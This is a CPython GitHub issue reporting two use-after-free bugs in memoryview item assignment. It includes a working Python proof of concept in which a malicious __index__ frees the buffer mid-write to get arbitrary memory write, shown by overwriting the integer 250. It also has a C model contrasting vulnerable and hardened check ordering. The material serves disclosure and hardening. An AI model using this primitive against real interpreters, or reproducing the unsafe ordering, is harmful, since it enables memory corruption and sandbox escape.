Title: Use After Free when assigning into a memoryview · Issue #92888 · python/cpython · GitHub
Opengraph URL: https://github.com/python/cpython/issues/92888
Issue #92888 in python/cpython, opened by chilaxan on 2022-05-17.

**Bug report**

Within memoryview.c, I have found two Use After Frees, both based around `memory_ass_sub`.
The first is if a class with a malicious `__index__` method is used as the index for the assignment: its index method is called after the memoryview is checked for whether it is released. This allows the index method to release the memoryview and backing buffer, leading to a write to freed memory when the write completes. The same vuln exists if the class with a malicious index method is used as the assigned value, as its `__index__` method is called inside of `pack_single`.

```py
# memoryview Use After Free (memory_ass_sub)
uaf_backing = bytearray(bytearray.__basicsize__)
uaf_view = memoryview(uaf_backing).cast('n')  # ssize_t format

class weird_index:
    def __index__(self):
        global memory_backing
        uaf_view.release()  # release memoryview (UAF)
        # free `uaf_backing` memory and allocate a new bytearray into it
        memory_backing = uaf_backing.clear() or bytearray()
        return 2  # `ob_size` idx

# by the time this line finishes executing, it writes the max ptr size
# into the `ob_size` slot of `memory_backing`
uaf_view[weird_index()] = (2 ** (tuple.__itemsize__ * 8) - 1) // 2
memory = memoryview(memory_backing)
memory[id(250) + int.__basicsize__] = 100
print(250)  # prints 100
```

**Your environment**

- CPython versions tested on: Python 3.10.2 (main, Feb 2 2022, 07:36:01) [Clang 12.0.0 (clang-1200.0.32.29)] on darwin
- Operating system and architecture: MacOS, 64bit
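The ordering defect the report describes, as an added, constructed C model rather than CPython's own memoryobject.c or its eventual fix: `assign_check_then_convert` checks the view before calling the `__index__`-style conversion callbacks and then writes through a pointer computed from state those callbacks may have released, while `assign_convert_then_check` runs every callback that can execute user code first and validates the view only after the last of them. The `view_t` and `scenario_t` types, all function names and the reused-storage scenario are assumptions made for this example; the scenario keeps both "owners" on one stack array so the stale write can be observed without real undefined behaviour.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of a memoryview-like object (assumption, not CPython's
 * memoryobject.c): a view onto borrowed storage that release() can give up.
 * Release only sets the flag; buf and len are left in place, so a later
 * write through the view is a write into storage the view no longer owns. */
typedef struct {
    unsigned char *buf;
    size_t len;
    bool released;
} view_t;

/* A conversion callback stands in for __index__: it runs arbitrary code and
 * may release the very view that is about to be written through. */
typedef long (*convert_fn)(view_t *v, void *ctx);

/* Vulnerable ordering (the pattern the report describes): released check
 * first, then key and value conversion run user code, then the write uses a
 * pointer derived from state the callbacks may have invalidated. */
int assign_check_then_convert(view_t *v, convert_fn key, convert_fn value, void *ctx)
{
    if (v->released)
        return -1;                          /* check ... */
    long i = key(v, ctx);                   /* ... user code runs here */
    if (i < 0 || (size_t)i >= v->len)
        return -1;
    unsigned char *ptr = v->buf + i;        /* pointer into the old storage */
    long x = value(v, ctx);                 /* and here (the pack_single case) */
    *ptr = (unsigned char)x;                /* stale write */
    return 0;
}

/* Hardened ordering: run every callback that can execute user code first,
 * then validate the view, then compute the pointer and write. Nothing that
 * could invalidate the view happens between the check and the use. */
int assign_convert_then_check(view_t *v, convert_fn key, convert_fn value, void *ctx)
{
    long i = key(v, ctx);
    long x = value(v, ctx);
    if (v->released)
        return -1;                          /* check after the last callback */
    if (i < 0 || (size_t)i >= v->len)
        return -1;
    v->buf[i] = (unsigned char)x;
    return 0;
}

/* Constructed scenario: the storage behind the view is reused by a new object
 * as soon as the view releases it, mirroring the bytearray free/reallocate
 * sequence in the report. */
typedef struct {
    unsigned char *storage;
    size_t size;
    unsigned char *new_owner;   /* non-NULL once the storage has been reused */
} scenario_t;

static long releasing_key(view_t *v, void *ctx)
{
    scenario_t *s = ctx;
    v->released = true;                     /* view.release() from inside __index__ */
    s->new_owner = s->storage;              /* storage handed to a fresh object */
    memset(s->new_owner, 0, s->size);
    return 2;                               /* index chosen by the callback */
}

static long constant_value(view_t *v, void *ctx)
{
    (void)v; (void)ctx;
    return 0xFF;
}

/* Runs one assignment routine against the scenario. Returns -1 if the routine
 * refused the write, otherwise the byte the new owner now sees at index 2. */
int byte_seen_by_new_owner(int (*assign)(view_t *, convert_fn, convert_fn, void *))
{
    unsigned char storage[16] = {0};
    view_t v = { storage, sizeof storage, false };
    scenario_t s = { storage, sizeof storage, NULL };
    if (assign(&v, releasing_key, constant_value, &s) != 0)
        return -1;
    return s.new_owner ? s.new_owner[2] : -1;
}

int main(void)
{
    printf("check-then-convert: new owner sees 0x%02x\n",
           byte_seen_by_new_owner(assign_check_then_convert));  /* 0xff */
    printf("convert-then-check: %d (write refused)\n",
           byte_seen_by_new_owner(assign_convert_then_check));  /* -1 */
    return 0;
}
```

The general rule the model illustrates: any call that can run interpreter-level code (`__index__`, `__int__`, buffer-protocol hooks) can invalidate checks made before it, so the released check, the bounds check and the pointer computation belong after the last such call, or must be repeated after it.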